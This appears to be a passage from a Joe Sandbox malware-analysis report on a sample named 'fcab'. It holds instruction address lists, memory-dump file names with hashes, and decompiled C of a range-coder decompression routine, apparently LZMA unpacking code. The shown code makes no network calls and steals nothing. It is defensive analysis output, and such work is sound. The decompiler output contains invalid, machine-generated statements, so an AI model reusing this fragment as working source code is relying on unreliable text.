                                                          0x0040719c
                                                          0x00406e04
                                                          0x00406e04
                                                          0x00406e07
                                                          0x00406e0a
                                                          0x00406e0e
                                                          0x00406e11
                                                          0x00406e17
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e1c
                                                          0x00406e1f
                                                          0x00000000
                                                          0x00000000
                                                          0x004069ef
                                                          0x004069ef
                                                          0x004069f3
                                                          0x00407160
                                                          0x00407160
                                                          0x00000000
                                                          0x00407160
                                                          0x004069f9
                                                          0x004069f9
                                                          0x004069fc
                                                          0x004069ff
                                                          0x00406a03
                                                          0x00406a06
                                                          0x00406a0c
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a11
                                                          0x00406a14
                                                          0x00406a14
                                                          0x00406a17
                                                          0x00406a1a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a20
                                                          0x00406a20
                                                          0x00406a26
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a2c
                                                          0x00406a2c
                                                          0x00406a30
                                                          0x00406a33
                                                          0x00406a36
                                                          0x00406a39
                                                          0x00406a3c
                                                          0x00406a3d
                                                          0x00406a40
                                                          0x00406a42
                                                          0x00406a48
                                                          0x00406a4b
                                                          0x00406a4e
                                                          0x00406a51
                                                          0x00406a54
                                                          0x00406a57
                                                          0x00406a5a
                                                          0x00406a76
                                                          0x00406a79
                                                          0x00406a7c
                                                          0x00406a7f
                                                          0x00406a86
                                                          0x00406a8a
                                                          0x00406a8c
                                                          0x00406a90
                                                          0x00406a5c
                                                          0x00406a5c
                                                          0x00406a60
                                                          0x00406a68
                                                          0x00406a6d
                                                          0x00406a6f
                                                          0x00406a71
                                                          0x00406a71
                                                          0x00406a93
                                                          0x00406a9a
                                                          0x00406a9d
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa8
                                                          0x00406aa8
                                                          0x00406aac
                                                          0x0040716c
                                                          0x0040716c
                                                          0x00000000
                                                          0x0040716c
                                                          0x00406ab2
                                                          0x00406ab2
                                                          0x00406ab5
                                                          0x00406ab8
                                                          0x00406abc
                                                          0x00406abf
                                                          0x00406ac5
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406aca
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406ad3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ad5
                                                          0x00406ad5
                                                          0x00406ad8
                                                          0x00406adb
                                                          0x00406ade
                                                          0x00406ae1
                                                          0x00406ae4
                                                          0x00406ae7
                                                          0x00406aea
                                                          0x00406aed
                                                          0x00406af0
                                                          0x00406af3
                                                          0x00406b0b
                                                          0x00406b0e
                                                          0x00406b11
                                                          0x00406b14
                                                          0x00406b14
                                                          0x00406b17
                                                          0x00406b1b
                                                          0x00406b1d
                                                          0x00406af5
                                                          0x00406af5
                                                          0x00406afd
                                                          0x00406b02
                                                          0x00406b04
                                                          0x00406b06
                                                          0x00406b06
                                                          0x00406b20
                                                          0x00406b27
                                                          0x00406b2a
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00406b2c
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00406b2a
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b6c
                                                          0x00406b6c
                                                          0x00406b70
                                                          0x00407178
                                                          0x00407178
                                                          0x00000000
                                                          0x00407178
                                                          0x00406b76
                                                          0x00406b76
                                                          0x00406b79
                                                          0x00406b7c
                                                          0x00406b80
                                                          0x00406b83
                                                          0x00406b89
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8e
                                                          0x00406b91
                                                          0x00406b91
                                                          0x00406b97
                                                          0x00406b35
                                                          0x00406b35
                                                          0x00406b38
                                                          0x00000000
                                                          0x00406b38
                                                          0x00406b99
                                                          0x00406b99
                                                          0x00406b9c
                                                          0x00406b9f
                                                          0x00406ba2
                                                          0x00406ba5
                                                          0x00406ba8
                                                          0x00406bab
                                                          0x00406bae
                                                          0x00406bb1
                                                          0x00406bb4
                                                          0x00406bb7
                                                          0x00406bcf
                                                          0x00406bd2
                                                          0x00406bd5
                                                          0x00406bd8
                                                          0x00406bd8
                                                          0x00406bdb
                                                          0x00406bdf
                                                          0x00406be1
                                                          0x00406bb9
                                                          0x00406bb9
                                                          0x00406bc1
                                                          0x00406bc6
                                                          0x00406bc8
                                                          0x00406bca
                                                          0x00406bca
                                                          0x00406be4
                                                          0x00406beb
                                                          0x00406bee
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406e7d
                                                          0x00406e7d
                                                          0x00406e81
                                                          0x004071a8
                                                          0x004071a8
                                                          0x00000000
                                                          0x004071a8
                                                          0x00406e87
                                                          0x00406e87
                                                          0x00406e8a
                                                          0x00406e8d
                                                          0x00406e91
                                                          0x00406e94
                                                          0x00406e9a
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c4d
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f8c
                                                          0x00406f8c
                                                          0x00406f90
                                                          0x00406fb2
                                                          0x00406fb2
                                                          0x00406fb5
                                                          0x00406fbf
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00406f92
                                                          0x00406f92
                                                          0x00406f95
                                                          0x00406f99
                                                          0x00406f9c
                                                          0x00406f9c
                                                          0x00406f9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00407049
                                                          0x00407049
                                                          0x0040704d
                                                          0x0040706b
                                                          0x0040706b
                                                          0x0040706b
                                                          0x0040706b
                                                          0x00407072
                                                          0x00407079
                                                          0x00407080
                                                          0x00407080
                                                          0x00407087
                                                          0x0040708a
                                                          0x00407091
                                                          0x00000000
                                                          0x00407094
                                                          0x0040704f
                                                          0x0040704f
                                                          0x00407052
                                                          0x00407055
                                                          0x00407058
                                                          0x0040705f
                                                          0x00406fa3
                                                          0x00406fa3
                                                          0x00406fa6
                                                          0x00000000
                                                          0x00000000
                                                          0x0040713a
                                                          0x0040713a
                                                          0x0040713d
                                                          0x0040703e
                                                          0x0040703e
                                                          0x0040703e
                                                          0x00000000
                                                          0x00407044
                                                          0x00000000
                                                          0x00406d74
                                                          0x00406d74
                                                          0x00406d76
                                                          0x00406d7d
                                                          0x00406d7e
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407087
                                                          0x00407087
                                                          0x0040708a
                                                          0x00407091
                                                          0x00000000
                                                          0x00407094
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406db9
                                                          0x00406db9
                                                          0x00406dbc
                                                          0x00406df2
                                                          0x00406df2
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f28
                                                          0x00406f2a
                                                          0x004071b4
                                                          0x004071b4
                                                          0x00000000
                                                          0x004071b4
                                                          0x00406f30
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f39
                                                          0x00406f39
                                                          0x00406f3d
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00000000
                                                          0x00406f40
                                                          0x00406dbe
                                                          0x00406dbe
                                                          0x00406dc0
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc7
                                                          0x00406dc8
                                                          0x00406dca
                                                          0x00406dcc
                                                          0x00406dcf
                                                          0x00406dd2
                                                          0x00406de8
                                                          0x00406de8
                                                          0x00406ded
                                                          0x00406e25
                                                          0x00406e25
                                                          0x00406e29
                                                          0x00406e52
                                                          0x00406e55
                                                          0x00406e57
                                                          0x00406e5e
                                                          0x00406e61
                                                          0x00406e64
                                                          0x00406e64
                                                          0x00406e69
                                                          0x00406e69
                                                          0x00406e6b
                                                          0x00406e6e
                                                          0x00406e75
                                                          0x00406e78
                                                          0x00406ea5
                                                          0x00406ea5
                                                          0x00406ea8
                                                          0x00406eab
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00000000
                                                          0x00406f1f
                                                          0x00406ead
                                                          0x00406ead
                                                          0x00406eb3
                                                          0x00406eb6
                                                          0x00406eb9
                                                          0x00406ebc
                                                          0x00406ebf
                                                          0x00406ec2
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ecb
                                                          0x00406ece
                                                          0x00406ee7
                                                          0x00406ee9
                                                          0x00406eec
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef2
                                                          0x00406ef5
                                                          0x00406ef7
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406efe
                                                          0x00406f01
                                                          0x00406f05
                                                          0x00406f07
                                                          0x00406f07
                                                          0x00406f08
                                                          0x00406f0b
                                                          0x00406f0e
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed8
                                                          0x00406edd
                                                          0x00406edf
                                                          0x00406ee2
                                                          0x00406ee2
                                                          0x00406f11
                                                          0x00406f18
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00406f1a
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00406f18
                                                          0x00406e2b
                                                          0x00406e2b
                                                          0x00406e2e
                                                          0x00406e30
                                                          0x00406e33
                                                          0x00406e36
                                                          0x00406e39
                                                          0x00406e3b
                                                          0x00406e3e
                                                          0x00406e41
                                                          0x00406e41
                                                          0x00406e44
                                                          0x00406e44
                                                          0x00406e47
                                                          0x00406e4e
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00000000
                                                          0x00406e50
                                                          0x00406e50
                                                          0x00000000
                                                          0x00406e50
                                                          0x00406e4e
                                                          0x00406dd4
                                                          0x00406dd4
                                                          0x00406dd7
                                                          0x00406dd9
                                                          0x00406ddc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b3b
                                                          0x00406b3b
                                                          0x00406b3f
                                                          0x00407184
                                                          0x00407184
                                                          0x00000000
                                                          0x00407184
                                                          0x00406b45
                                                          0x00406b45
                                                          0x00406b48
                                                          0x00406b4b
                                                          0x00406b4e
                                                          0x00406b51
                                                          0x00406b54
                                                          0x00406b57
                                                          0x00406b59
                                                          0x00406b5c
                                                          0x00406b5f
                                                          0x00406b62
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cc6
                                                          0x00406cc6
                                                          0x00406cca
                                                          0x00407190
                                                          0x00407190
                                                          0x00000000
                                                          0x00407190
                                                          0x00406cd0
                                                          0x00406cd0
                                                          0x00406cd3
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cde
                                                          0x00406ce1
                                                          0x00406ce4
                                                          0x00406ce7
                                                          0x00406cea
                                                          0x00406ced
                                                          0x00406cee
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf3
                                                          0x00406cf6
                                                          0x00406cf9
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cff
                                                          0x00406d01
                                                          0x00406d01
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f47
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f4d
                                                          0x00406f4d
                                                          0x00406f50
                                                          0x00406f53
                                                          0x00406f56
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f5b
                                                          0x00406f5e
                                                          0x00406f61
                                                          0x00406f64
                                                          0x00406f67
                                                          0x00406f6a
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f70
                                                          0x00406f73
                                                          0x00406f76
                                                          0x00406f79
                                                          0x00406f7c
                                                          0x00406f80
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00000000
                                                          0x00406f87
                                                          0x00406f87
                                                          0x00406d04
                                                          0x00406d04
                                                          0x00000000
                                                          0x00406d04
                                                          0x00406f85
                                                          0x004071ba
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9
                                                          0x004071f1
                                                          0x004071f1
                                                          0x00000000
                                                          0x004071f1
                                                          0x0040703e
                                                          0x004070be
                                                          0x00407087

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                          • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                                          • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                          • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E00406F8C() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
